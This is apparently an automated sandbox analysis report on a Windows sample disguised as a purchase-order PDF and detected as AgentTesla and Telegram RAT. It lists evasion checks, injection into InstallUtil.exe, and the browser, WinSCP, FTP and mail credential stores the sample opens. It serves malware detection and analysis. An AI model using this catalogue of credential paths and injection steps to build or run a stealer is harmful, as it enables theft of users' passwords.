Source: Afoagcjtqvi.exe, 00000007.00000002.1963893230.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: Afoagcjtqvi.exe, 00000002.00000002.1885629638.0000000001392000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753113997.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1984248653.00000000057E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 180000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 602000 Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63C000 Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63E000 Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 180000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 182000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1BC000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1BE000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3F4008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 649008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Queries volume information: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Queries volume information: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Queries volume information: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2973425919.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.000000000258E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973425919.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\FTP Navigator\Ftplist.txt
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected Credential Stealer
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2973425919.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.000000000258E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973425919.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
